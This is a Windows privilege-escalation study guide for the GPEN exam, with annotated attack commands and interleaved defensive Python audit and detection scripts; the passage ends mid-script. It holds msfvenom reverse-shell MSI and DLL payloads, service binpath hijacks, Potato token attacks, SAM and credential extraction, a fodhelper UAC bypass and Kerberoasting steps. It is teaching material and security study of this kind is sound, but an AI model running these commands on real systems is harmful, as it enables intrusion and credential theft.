A comprehensive reference guide for Windows privilege escalation techniques. This guide is designed as a study aid for GPEN certification and practical penetration testing.
1. Enumeration
System Information
Gather OS version, architecture, hotfixes to identify missing patches.
systeminfo
# Displays detailed system information including OS version, build number,
# installed hotfixes (patches), system architecture, and domain info.
# This is your starting point - look for missing patches that have known exploits.
hostname
# Shows the computer name. Useful for identifying the machine and understanding
# the naming convention (might hint at its role: WEB01, DC01, etc.)
whoami /all
# Shows current username, SID (Security Identifier), group memberships,
# and ALL privileges assigned to your token. The privileges section is critical
# for identifying privesc opportunities like SeImpersonatePrivilege.
wmic qfe list
# Lists all installed Windows updates/hotfixes (Quick Fix Engineering).
# Compare against known vulnerable versions to find missing security patches.
# Format: HotFixID, InstalledOn date, Description
wmic os get osarchitecture
# Shows if the system is 32-bit (x86) or 64-bit (x64).
# Important for selecting correct exploit binaries and payloads.
EXAM TIP: Always start with systeminfo - look for missing KBs that correspond to known exploits.
MITRE ATT&CK: T1082
User & Group Enumeration
Identify current privileges, group memberships, and other users.
whoami /priv
# Lists all privileges assigned to your current access token.
# KEY PRIVILEGES TO LOOK FOR:
# - SeImpersonatePrivilege: Can impersonate tokens (Potato attacks)
# - SeDebugPrivilege: Can debug processes (dump memory, inject code)
# - SeBackupPrivilege: Can read any file (backup operators)
# - SeRestorePrivilege: Can write any file
# - SeTakeOwnershipPrivilege: Can take ownership of objects
whoami /groups
# Shows all groups the current user belongs to.
# Look for: Administrators, Backup Operators, Remote Desktop Users,
# and any custom groups that might have elevated permissions.
net user
# Lists all local user accounts on the system.
# Helps identify other accounts to potentially target or impersonate.
net localgroup administrators
# Shows all members of the local Administrators group.
# These are your targets - accounts with full system access.
net user <username>
# Shows detailed info about a specific user: password policy,
# last logon, group memberships, account status (enabled/disabled).
EXAM TIP: Check for SeImpersonatePrivilege, SeDebugPrivilege, SeBackupPrivilege - these are privesc goldmines.
Network Information
ipconfig /all
# Shows all network interfaces with full details: IP addresses,
# subnet masks, default gateways, DNS servers, DHCP info.
# Look for multiple interfaces (might indicate dual-homed host).
netstat -ano
# Lists all active network connections and listening ports.
# -a: all connections, -n: numeric (no DNS resolution), -o: shows process ID
# Look for: internal services, connections to other hosts, unusual ports
arp -a
# Shows the ARP cache - IP to MAC address mappings.
# Reveals other hosts on the local network that this machine has communicated with.
route print
# Displays the routing table - shows how traffic is routed.
# Can reveal other network segments this host can reach.
Automated Enumeration Tools
# PowerUp (PowerSploit)
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# PowerUp is a PowerShell script that checks for common Windows privilege
# escalation vectors. Invoke-AllChecks runs ALL checks at once:
# - Unquoted service paths
# - Modifiable services
# - Modifiable service binaries
# - AlwaysInstallElevated
# - Autologon credentials
# - Cached GPP passwords
# Returns actionable results with abuse functions you can run.
# winPEAS
.\winPEASany.exe
# Windows Privilege Escalation Awesome Scripts - comprehensive enumeration.
# Color-coded output: RED = almost certain privesc, YELLOW = possible
# Checks everything: services, scheduled tasks, credentials, network, etc.
# Very thorough but generates lots of output - learn to read it efficiently.
# Seatbelt
.\Seatbelt.exe -group=all
# C# tool that performs security-focused host enumeration.
# Groups: all, user, system, slack, chrome, remote, misc
# More targeted than winPEAS, excellent for specific checks.
# SharpUp
.\SharpUp.exe
# C# port of PowerUp's functionality.
# Useful when PowerShell is blocked or being monitored.
# Same checks as PowerUp but compiled as an executable.
EXAM TIP: PowerUp is essential - know Invoke-AllChecks and what each check looks for.
2. Misconfigurations
Unquoted Service Paths
Services with spaces in path and no quotes allow DLL/EXE hijacking.
How it works: When Windows starts a service with an unquoted path containing spaces, it tries to execute each "portion" of the path. For C:\Program Files\My App\service.exe, Windows tries:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My App\service.exe
If you can write to any of these locations, you can hijack the service.
# Find unquoted paths
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """
# This command:
# - Gets service name, path, and start mode
# - Filters OUT paths in C:\Windows (usually not writable)
# - Filters OUT paths that ARE quoted (have ")
# What remains are potentially exploitable unquoted paths.
# PowerUp check
Get-UnquotedService
# PowerUp function that finds unquoted service paths AND checks
# if any path segments are writable by the current user.
# Returns only actionable results.
# Exploit: Place malicious exe in writable path segment
# Example: C:\Program Files\My App\service.exe
# If C:\ is writable, place C:\Program.exe (your payload)
# If C:\Program Files\ is writable, place C:\Program Files\My.exe
# Restart the service and your payload executes as SYSTEM.
EXAM TIP: Classic exam question - understand WHY Windows searches each path segment.
MITRE ATT&CK: T1574.009
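The same search behaviour as an added audit script, not PowerUp's or this guide's own code: it parses the wmic output above (a constructed sample is embedded so it runs offline), lists the executables Windows would probe ahead of the real binary, and produces the quoted ImagePath that fixes the service. The column layout mimics wmic's fixed-width table; service names and paths are made up.

```python
"""Audit unquoted service paths and show which executables Windows would
probe before the real one. Parses the text printed by
`wmic service get name,pathname,startmode`."""
import re

# Constructed sample laid out like wmic's fixed-width table (not real host data).
_ROWS = [
    ("Name",     "PathName",                                              "StartMode"),
    ("AcmeSvc",  r"C:\Program Files\Acme Corp\bin\acme service.exe -log", "Auto"),
    ("Spooler",  r"C:\Windows\System32\spoolsv.exe",                      "Auto"),
    ("GoodSvc",  r'"C:\Program Files\Good App\good.exe" -run',            "Auto"),
    ("PlainSvc", r"C:\tools\svc.exe",                                     "Manual"),
]
WMIC_SAMPLE = "\n".join(f"{n:<12}{p:<60}{s}" for n, p, s in _ROWS) + "\n"


def parse_wmic_table(text: str) -> list:
    """Parse wmic's fixed-width output: column boundaries come from the header."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header, rows = lines[0], lines[1:]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", header)]
    ends = [s for _, s in cols][1:] + [None]
    return [{name: row[s:e].strip() for (name, s), e in zip(cols, ends)}
            for row in rows]


def probe_paths(image_path: str) -> list:
    """Executables CreateProcess tries, in order, for an unquoted path with
    spaces: it cuts the string at each space and appends .exe when the prefix
    has no extension. The first prefix that ends in .exe is the real binary."""
    parts = image_path.split(" ")
    probes = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        is_exe = prefix.lower().endswith(".exe")
        probes.append(prefix if is_exe else prefix + ".exe")
        if is_exe:
            break
    return probes


def audit_unquoted_services(wmic_text: str, skip_windows_dir: bool = True) -> list:
    """One finding per service whose executable path is unquoted and contains
    a space: the paths a planted file would pre-empt, and the quoted ImagePath
    that fixes it (apply with sc config <svc> binPath= "...")."""
    findings = []
    for svc in parse_wmic_table(wmic_text):
        path = svc.get("PathName", "")
        if not path or path.startswith('"'):
            continue  # quoted paths are parsed unambiguously
        if skip_windows_dir and path.lower().startswith("c:\\windows\\"):
            continue  # same filter as the wmic one-liner: System32 is not user-writable
        probes = probe_paths(path)
        if len(probes) < 2:
            continue  # no space before the .exe, nothing to hijack
        exe = probes[-1]
        args = path[len(exe):] if path.lower().startswith(exe.lower()) else ""
        findings.append({
            "service": svc["Name"],
            "path": path,
            "probes": probes[:-1],    # each must live in a directory only admins can write
            "fix": f'"{exe}"{args}',  # quoting removes the ambiguity
        })
    return findings


if __name__ == "__main__":
    for f in audit_unquoted_services(WMIC_SAMPLE):
        print(f["service"], "->", f["fix"])
        for p in f["probes"]:
            print("   would probe:", p)
```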
Weak Service Permissions
Services where low-priv users can modify config or binary.
How it works: Windows services have ACLs (Access Control Lists) that define who can start, stop, or configure them. If a low-privilege user has SERVICE_CHANGE_CONFIG permission, they can change the service’s binary path to point to a malicious executable.
# Check service permissions with accesschk
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# accesschk is a Sysinternals tool that shows effective permissions.
# -u: suppress errors, -w: show write access only
# -c: service name, -q: quiet (no banner), -v: verbose
# "Authenticated Users" - check what this group can modify
# Look for SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG
accesschk.exe -uwcqv "Users" * /accepteula
# Same check for the Users group.
# Any service with write permissions for these groups is exploitable.
# PowerUp
Get-ModifiableService
# Finds services where current user can modify the configuration.
# Returns service name and the specific permission you have.
# Modify service binary path
sc config <svc> binpath= "C:\temp\shell.exe"
# sc (Service Control) modifies service configuration.
# binpath= sets the executable path (note the space after =)
# Point it to your reverse shell or other payload.
sc stop <svc>
# Stop the service (need permission, or wait for reboot)
sc start <svc>
# Start the service - executes your payload as SYSTEM
# May need to wait for automatic restart or system reboot.
EXAM TIP: Look for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS for non-admin users.
MITRE ATT&CK: T1574.011
Weak File/Folder Permissions
# Check permissions on service binary
icacls "C:\path\to\service.exe"
# icacls shows file/folder permissions in Windows.
# Look for: (F) Full control, (M) Modify, (W) Write
# If "Users" or "Everyone" has write access, you can replace the binary.
# accesschk for writable directories
accesschk.exe -uwdqs Users C:\
# -d: directory, -s: recurse subdirectories
# Finds all directories writable by Users group.
# Useful for finding where to drop payloads.
accesschk.exe -uwdqs "Authenticated Users" C:\
# Same check for Authenticated Users group.
# PowerUp
Get-ModifiableServiceFile
# Finds services where you can modify the actual binary file.
# Different from modifiable service config - this is the EXE itself.
MITRE ATT&CK: T1574.010
AlwaysInstallElevated
Registry setting allowing any user to install MSI as SYSTEM.
How it works: When both HKLM and HKCU registry keys are set to 1, any user can install MSI packages with SYSTEM privileges. This is a massive security hole - you just create a malicious MSI and install it.
# Check registry keys (both must be 1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Queries the Local Machine policy. Must return 0x1 (enabled).
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Queries the Current User policy. Must ALSO return 0x1.
# BOTH keys must be set to 1 for this attack to work!
# Generate malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > shell.msi
# msfvenom creates payloads. -p specifies payload type.
# -f msi outputs as Windows Installer package.
# The MSI will execute your reverse shell when installed.
# Install
msiexec /quiet /qn /i shell.msi
# msiexec is the Windows Installer tool.
# /quiet: no user interaction, /qn: no UI at all
# /i: install the package
# Runs silently and gives you a SYSTEM shell.
EXAM TIP: Both HKLM and HKCU keys must be set to 1 for this to work.
MITRE ATT&CK: T1574.007
Registry Autoruns
# Common autorun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Programs here run at startup for ALL users.
# If you can modify these entries or the binaries they point to,
# your payload runs next time any user logs in.
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Programs here run at startup for the CURRENT user only.
# Easier to modify but only triggers for this user.
# Check permissions on autorun binaries
accesschk.exe -wvu "C:\path\to\autorun.exe"
# -v: verbose, shows all permissions
# If you can write to the binary, replace it with payload.
# Wait for reboot/logon and your code runs.
MITRE ATT&CK: T1547.001
3. Credential Hunting
Credentials in Files
# Search for password strings
findstr /si password *.txt *.ini *.config *.xml
# findstr is Windows grep. Searches file contents.
# /s: search subdirectories, /i: case-insensitive
# Searches common config file types for "password"
findstr /spin "password" *.*
# /p: skip non-printable characters, /n: show line numbers
# Broader search across all file types.
# Common locations
type C:\unattend.xml
# Unattend.xml is used for automated Windows installations.
# Often contains plaintext admin passwords! Check for:
# <AutoLogon>, <AdministratorPassword> sections
type C:\sysprep\sysprep.xml
# Similar to unattend.xml - used for system preparation.
# May contain base64-encoded admin passwords.
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# PowerShell command history! Users often type passwords in commands.
# Example: "Connect-MsolService -Credential $cred" might show passwords
# in previous commands. Goldmine for lazy admins.
# IIS config
type C:\inetpub\wwwroot\web.config
# IIS web application config file.
# Often contains database connection strings with plaintext passwords.
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
# Machine-level .NET config. May have connection strings.
EXAM TIP: PowerShell history and unattend.xml are frequently tested.
MITRE ATT&CK: T1552.001
Registry Credentials
# Autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Windows autologon stores credentials in registry!
# Look for: DefaultUserName, DefaultPassword, DefaultDomainName
# If autologon is configured, password is stored in plaintext.
# VNC passwords
reg query HKCU\Software\ORL\WinVNC3 /v Password
# VNC stores passwords in registry (weakly encrypted).
# Can be decrypted with vncpwd or online tools.
# Putty saved sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
# PuTTY SSH client saves session configurations.
# May include: hostnames, usernames, sometimes proxy passwords.
# /s recurses through all saved sessions.
MITRE ATT&CK: T1552.002
Saved Credentials
# List saved credentials
cmdkey /list
# Shows credentials stored in Windows Credential Manager.
# These can be used with runas without knowing the password!
# Look for: Domain credentials, "virtualapp/didlogical" entries
# Use saved creds with runas
runas /savecred /user:admin cmd.exe
# /savecred uses stored credentials without prompting.
# If admin creds are saved, instant privilege escalation!
# Works even if you don't know the actual password.
# Extract with Mimikatz
sekurlsa::credman
# Mimikatz can dump Credential Manager contents.
# Shows plaintext passwords from the credential vault.
EXAM TIP: If cmdkey shows stored creds, runas /savecred is an easy win.
MITRE ATT&CK: T1555.004
SAM & SYSTEM Files
# Check for backup files
dir C:\Windows\Repair\SAM
# SAM (Security Account Manager) contains local password hashes.
# Can't read live SAM, but backup copies might be accessible.
dir C:\Windows\System32\config\RegBack\
# Registry backup folder. May contain SAM and SYSTEM copies.
# SYSTEM file has the boot key needed to decrypt SAM hashes.
# Volume Shadow Copy
vssadmin list shadows
# Lists all Volume Shadow Copies (system restore points).
# Shadow copies contain backups of system files including SAM!
# Extract from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
# Access files from shadow copy using device path.
# Now you have SAM and SYSTEM files to crack offline!
# Dump with secretsdump
secretsdump.py -sam SAM -system SYSTEM LOCAL
# Impacket's secretsdump extracts hashes from SAM file.
# -system provides boot key for decryption.
# Outputs NTLM hashes that can be cracked or used for pass-the-hash.
MITRE ATT&CK: T1003.002
4. Token Impersonation
Potato Attacks
Abuse SeImpersonatePrivilege to escalate to SYSTEM.
How it works: Service accounts (like IIS, SQL Server) often have SeImpersonatePrivilege. Potato attacks trick a SYSTEM process into authenticating to you, then impersonate that token to become SYSTEM.
# Check for SeImpersonatePrivilege
whoami /priv
# Look for "SeImpersonatePrivilege" in the output.
# If "Enabled", you can perform token impersonation attacks.
# Common on: IIS AppPool accounts, SQL Server accounts, service accounts
# JuicyPotato (pre-2019)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
# -l: local COM server port
# -p: program to run as SYSTEM
# -t *: try both CreateProcessWithToken and CreateProcessAsUser
# -c: CLSID of a COM server that runs as SYSTEM
# Works on Windows 7/8/2008/2012/2016 (before patches)
# PrintSpoofer (2019+)
PrintSpoofer.exe -i -c cmd
# Abuses the Print Spooler service to get SYSTEM token.
# -i: interactive console, -c: command to run
# Works on Windows 10/Server 2016/2019 where JuicyPotato is patched.
# Simpler to use - no CLSID hunting required.
# RoguePotato
RoguePotato.exe -r <attacker_ip> -e "cmd.exe" -l 9999
# Requires a machine you control to act as rogue OXID resolver.
# -r: attacker IP running socat redirect
# -e: executable to run, -l: local port
# More complex but works in more situations.
# GodPotato (2022+)
GodPotato.exe -cmd "cmd /c whoami"
# Latest in the Potato family. Works on very recent Windows.
# Simpler syntax - just specify command to run.
# Preferred choice for modern Windows systems.
EXAM TIP: Service accounts often have SeImpersonatePrivilege - Potato family exploits are essential.
Potato Variants: JuicyPotato, RoguePotato, PrintSpoofer, SweetPotato, GodPotato
MITRE ATT&CK: T1134.001
Token Stealing
# Incognito (Metasploit)
load incognito
# Loads the incognito extension in Meterpreter.
# Allows token manipulation and impersonation.
list_tokens -u
# Lists available tokens by user.
# Shows tokens that can be impersonated from current position.
# Look for: NT AUTHORITY\SYSTEM, Domain Admins, high-priv users
impersonate_token "NT AUTHORITY\SYSTEM"
# Impersonates the SYSTEM token.
# Now all your actions run as SYSTEM!
# Can impersonate any token shown in list_tokens.
# Migrate to SYSTEM process in meterpreter
migrate <SYSTEM_PID>
# Moves your Meterpreter session into a SYSTEM process.
# Find SYSTEM PIDs with: ps | grep -i system
# Common targets: lsass.exe, services.exe, winlogon.exe
# Gives you SYSTEM privileges if migration succeeds.
MITRE ATT&CK: T1134.001
5. Kernel Exploits
Finding Vulnerable Kernel
# Get OS and patch info
systeminfo
# Note the OS version, build number, and installed hotfixes.
# Cross-reference with known vulnerable versions.
# Windows Exploit Suggester
python windows-exploit-suggester.py --database 2024-01-01-mssb.xls --systeminfo sysinfo.txt
# Compares systeminfo output against Microsoft Security Bulletins.
# --database: Excel file with vulnerability data (update regularly!)
# --systeminfo: output of systeminfo command saved to file
# Returns list of potentially applicable exploits.
# Watson (.NET)
Watson.exe
# C# tool that checks for missing KBs related to privilege escalation.
# Runs locally, doesn't need database file.
# More up-to-date than Windows Exploit Suggester.
# Sherlock (PowerShell - older)
Import-Module .\Sherlock.ps1
Find-AllVulns
# PowerShell script for finding kernel vulns.
# Older, doesn't include recent CVEs.
# Watson or WES-NG are preferred now.
EXAM TIP: Know the major kernel CVEs by OS version - MS16-032, MS17-010, etc.
MITRE ATT&CK: T1068
Common Kernel CVEs
# MS16-032 (Secondary Logon)
Invoke-MS16032
# Affects Windows 7/8/10, Server 2008/2012
# Race condition in Secondary Logon service
# Reliable, commonly works, PowerShell script available.
# MS17-010 (EternalBlue)
# The famous SMB vulnerability used by WannaCry.
# Usually exploited remotely, but local variants exist.
# Affects: Windows 7/8/2008/2012 without KB4012212
# CVE-2021-1732 (Win32k)
# Win32k elevation of privilege vulnerability.
# Affects Windows 10/Server 2016/2019
# CVE-2021-34527 (PrintNightmare)
# Print Spooler vulnerability - both RCE and LPE.
# Can add local admin users via Point and Print.
# Very widespread impact.
# CVE-2022-21999 (SpoolFool)
# Another Print Spooler elevation of privilege.
# Affects multiple Windows versions.
Key CVEs: MS16-032, MS17-010, PrintNightmare, HiveNightmare/SeriousSAM
6. Scheduled Tasks
Enumerate Tasks
# List all scheduled tasks
schtasks /query /fo LIST /v
# Shows all scheduled tasks with verbose details.
# /fo LIST: output format, /v: verbose
# Look for tasks running as SYSTEM with writable binaries.
# PowerUp check
Get-ModifiableScheduledTaskFile
# Finds scheduled tasks where you can modify the binary.
# Returns actionable results only.
# Check task file permissions
accesschk.exe -uwdqv "C:\TaskScripts"
# Check who can write to directories containing task scripts.
# -u: suppress errors, -w: writable only, -d: directory, -q: no banner, -v: verbose
# Do not end the quoted path with a backslash: cmd passes \" as an escaped quote.
# If writable, replace scripts with malicious versions.
# Task details
schtasks /query /tn "TaskName" /fo LIST /v
# Get detailed info about a specific task.
# /tn: task name to query
# Shows: run times, run as user, actions, triggers
MITRE ATT&CK: T1053.005
Exploiting Tasks
# If task binary is writable:
copy malicious.exe "C:\path\to\task.exe"
# Replace the legitimate binary with your payload.
# Use same filename so task doesn't break.
# Payload runs with the task's privileges (often SYSTEM).
# Wait for task to run or trigger manually
schtasks /run /tn "TaskName"
# Manually triggers a scheduled task.
# May need appropriate permissions.
# Otherwise, wait for scheduled execution time.
7. DLL Hijacking
DLL Search Order
How it works: When an application loads a DLL without a full path, Windows searches directories in a specific order. If you can write to a directory searched before the legitimate DLL location, your malicious DLL loads instead.
Windows DLL Search Order (with SafeDllSearchMode enabled, the default; when it is disabled the current directory is searched second, right after the application directory):
1. Application directory (where the .exe is)
2. System directory (C:\Windows\System32)
3. 16-bit system directory
4. Windows directory (C:\Windows)
5. Current directory
6. PATH directories
# Find missing DLLs with Process Monitor
# Filter: Result = NAME NOT FOUND, Path ends with .dll
# This shows DLLs the application tried to load but couldn't find.
# If you can write to a searched location, you can hijack!
EXAM TIP: Understand SafeDllSearchMode and how it affects search order.
MITRE ATT&CK: T1574.001
Exploiting DLL Hijack
# Generate malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > hijack.dll
# Creates a DLL payload that spawns a reverse shell.
# -f dll: output format as DLL
# DLL executes when loaded by the target application.
# Place in writable location in search path
copy hijack.dll C:\WritableDir\missing.dll
# Name must match what the application is looking for.
# Place in directory that's searched before the real DLL.
# Restart service/application
# The application loads your DLL, executing your payload.
# Payload runs with the application's privileges.
8. UAC Bypass
Check UAC Level
# Check UAC level
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
# EnableLUA=1 means UAC is enabled.
# EnableLUA=0 means UAC is disabled (rare in modern Windows).
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
# Determines how UAC prompts administrators.
# Values:
# 0 = No prompt (UAC effectively disabled for admins)
# 1 = Prompt for credentials on secure desktop
# 2 = Prompt for consent on secure desktop
# 5 = Prompt for consent for non-Windows binaries (default)
MITRE ATT&CK: T1548.002
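A hardening check, added here and not part of this guide's tooling, that covers three of the registry checks in this guide at once: the AlwaysInstallElevated keys from section 2, the Winlogon autologon values from section 3, and the two UAC values just above. It parses saved `reg query` output (a constructed sample is embedded) and rates what it finds; the key paths and value names are the ones this guide queries, the severities and sample data are my own.

```python
"""Hardening audit over captured `reg query` output: AlwaysInstallElevated
(both hives), Winlogon autologon credentials, and the UAC policy values."""
import re

# Constructed sample: several `reg query ... /v ...` outputs captured into
# one file (not real host data). A missing value prints an ERROR line instead
# of a data row; the parser ignores anything that is not a key or value line.
REG_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    kiosk
    DefaultPassword    REG_SZ    constructed-sample-password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1
    ConsentPromptBehaviorAdmin    REG_DWORD    0x0
"""

_VALUE_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")  # reg.exe's 4-space layout
HKLM, HKCU = "hkey_local_machine", "hkey_current_user"
INSTALLER = r"\policies\microsoft\windows\installer"
WINLOGON = r"\microsoft\windows nt\currentversion\winlogon"
UAC = r"\microsoft\windows\currentversion\policies\system"


def parse_reg_query(text: str) -> dict:
    """Map (full key path lowercased, value name lowercased) -> data string."""
    values, key = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip().lower()
            continue
        m = _VALUE_RE.match(line)
        if m and key:
            name, _rtype, data = m.groups()
            values[(key, name.lower())] = data.strip()
    return values


def _lookup(values, hive, suffix, name):
    for (key, vname), data in values.items():
        if key.startswith(hive) and key.endswith(suffix) and vname == name.lower():
            return data
    return None


def _dword(values, hive, suffix, name):
    data = _lookup(values, hive, suffix, name)
    return int(data, 0) if data else None   # reg prints DWORDs as 0x...


def audit_registry(reg_text: str) -> list:
    """Return (severity, message) findings; HIGH means a direct privesc path."""
    v, out = parse_reg_query(reg_text), []
    hklm = _dword(v, HKLM, INSTALLER, "AlwaysInstallElevated")
    hkcu = _dword(v, HKCU, INSTALLER, "AlwaysInstallElevated")
    if hklm == 1 and hkcu == 1:
        out.append(("HIGH", "AlwaysInstallElevated=1 in HKLM and HKCU: any user "
                            "can install an MSI as SYSTEM; set both to 0"))
    elif hklm == 1 or hkcu == 1:
        out.append(("LOW", "AlwaysInstallElevated set in one hive only: not "
                           "exploitable alone, but clear it before the other is set"))
    if _lookup(v, HKLM, WINLOGON, "DefaultPassword"):
        out.append(("HIGH", "Winlogon DefaultPassword present: autologon keeps a "
                            "plaintext password readable by any local user"))
    if _dword(v, HKLM, UAC, "EnableLUA") == 0:
        out.append(("HIGH", "EnableLUA=0: UAC is disabled"))
    cpba = _dword(v, HKLM, UAC, "ConsentPromptBehaviorAdmin")
    if cpba == 0:
        out.append(("HIGH", "ConsentPromptBehaviorAdmin=0: admins elevate silently"))
    elif cpba == 5:
        out.append(("MEDIUM", "ConsentPromptBehaviorAdmin=5 (default): auto-elevating "
                              "Windows binaries such as fodhelper.exe run without a "
                              "prompt; 2 ('Always notify') prompts for every elevation"))
    return out
```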
Bypass Techniques
How it works: Certain Windows binaries auto-elevate without UAC prompts. We can hijack registry keys these binaries check and make them execute our payload with elevated privileges.
# Fodhelper bypass
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
# Creates a registry key that fodhelper.exe will check.
# /d: sets the default value (command to run)
# /f: force without confirmation
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
# Must add empty DelegateExecute value for bypass to work.
# /v: value name, /t REG_SZ: string type
fodhelper.exe
# Windows binary that auto-elevates.
# Checks our registry key before executing.
# Runs our cmd.exe as Administrator!
# Metasploit
use exploit/windows/local/bypassuac_fodhelper
# Automated module that performs the above steps.
# Set SESSION to your existing Meterpreter session.
# Returns new elevated session.
# UACME tool (many techniques)
Akagi64.exe <method_number> <payload>
# Collection of 60+ UAC bypass methods.
# Different methods work on different Windows versions.
# Example: Akagi64.exe 23 cmd.exe
EXAM TIP: Fodhelper bypass works on Win10 - frequently tested.
9. AD-Related PrivEsc
Kerberoasting
How it works: Any domain user can request service tickets for accounts with SPNs (Service Principal Names). The ticket is encrypted with the service account’s password hash. We request these tickets, extract them, and crack offline.
# Rubeus
Rubeus.exe kerberoast /outfile:hashes.txt
# Rubeus is a C# Kerberos abuse toolkit.
# kerberoast: requests TGS tickets for all accounts with SPNs
# /outfile: saves hashes in crackable format
# Hashes are in Hashcat/John format.
# Impacket
GetUserSPNs.py domain/user:password -dc-ip <DC_IP> -request
# Python alternative using Impacket library.
# Connects to DC and requests SPN tickets.
# -request: actually request the tickets (not just enumerate)
# PowerView
Invoke-Kerberoast -OutputFormat Hashcat
# PowerShell method using PowerView.
# Returns hashes formatted for Hashcat.
# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt
# -m 13100: Kerberos 5 TGS-REP etype 23 (rc4-hmac)
# Service accounts often have weak passwords.
# Domain admin service accounts = game over.
EXAM TIP: High-value topic - know the full attack chain.
MITRE ATT&CK: T1558.003
AS-REP Roasting
How it works: Accounts with “Do not require Kerberos pre-authentication” can be attacked. We request AS-REP without proving identity, getting a response encrypted with the user’s hash.
# Find vulnerable accounts
Get-DomainUser -PreauthNotRequired
# PowerView function to find users without pre-auth.
# These are targets for AS-REP roasting.
# Rubeus
Rubeus.exe asreproast /outfile:asrep.txt
# Requests AS-REP for vulnerable users.
# Saves crackable hashes to file.
# Impacket
GetNPUsers.py domain/ -usersfile users.txt -dc-ip <DC_IP>
# NP = No Pre-authentication required
# -usersfile: file containing usernames to try
# Can enumerate and request without credentials!
# Crack
hashcat -m 18200 asrep.txt wordlist.txt
# -m 18200: Kerberos 5 AS-REP etype 23
# Similar to Kerberoasting but targets user accounts.
MITRE ATT&CK: T1558.004
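The defender's side of Kerberoasting and AS-REP roasting, as an added example rather than this guide's code: detection logic over a constructed batch of 4768/4769 Security events, using the RC4 ticket etype and PreAuthType 0 as the discriminators the two sections above describe. Field names follow the event XML; the thresholds, account names and timestamps are assumptions.

```python
"""Detection logic for Kerberoasting (4769) and AS-REP roasting (4768).
Kerberoasting looks like one requester pulling RC4 (0x17) service tickets
for several distinct SPN-backed accounts in a short window; AS-REP roasting
looks like a 4768 with PreAuthType 0 and an RC4 ticket, since the reply to
such a request is the crackable blob."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4 = "0x17"          # etype 23; AES tickets are 0x11/0x12


def _ev(eid, ts, user, ip, etype, **extra):
    """Build a record with the field names used in the 4768/4769 event XML."""
    return {"EventID": eid, "TimeCreated": ts, "TargetUserName": user,
            "IpAddress": ip, "TicketEncryptionType": etype, "Status": "0x0", **extra}


# Constructed sample: jdoe pulls RC4 tickets for three service accounts in two
# seconds (roast), asmith gets a normal AES ticket, legacy_app has pre-auth off.
EVENTS = [
    _ev(4769, "2024-05-01T09:00:01", "jdoe@CORP.LOCAL", "10.0.0.5", RC4, ServiceName="svc_sql"),
    _ev(4769, "2024-05-01T09:00:02", "jdoe@CORP.LOCAL", "10.0.0.5", RC4, ServiceName="svc_web"),
    _ev(4769, "2024-05-01T09:00:02", "jdoe@CORP.LOCAL", "10.0.0.5", RC4, ServiceName="svc_backup"),
    _ev(4769, "2024-05-01T09:00:03", "jdoe@CORP.LOCAL", "10.0.0.5", "0x12", ServiceName="WS01$"),
    _ev(4769, "2024-05-01T09:30:00", "asmith@CORP.LOCAL", "10.0.0.9", "0x12", ServiceName="svc_sql"),
    _ev(4768, "2024-05-01T09:31:00", "legacy_app", "10.0.0.5", RC4, PreAuthType="0"),
    _ev(4768, "2024-05-01T09:31:01", "asmith", "10.0.0.9", "0x12", PreAuthType="2"),
]


def detect_kerberoast(events, window=timedelta(minutes=5), threshold=3):
    """Alert when one (account, source IP) obtains RC4 TGS tickets for at least
    `threshold` distinct service accounts inside `window`. Machine accounts
    (name$) and krbtgt are skipped: their random passwords are not crackable
    and they dominate normal ticket volume. In a domain that still defaults to
    RC4 this rule is noisy; the etype test is what makes it sharp elsewhere."""
    per_requester = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0" or e["TicketEncryptionType"] != RC4:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_requester[(e["TargetUserName"], e["IpAddress"])].append(
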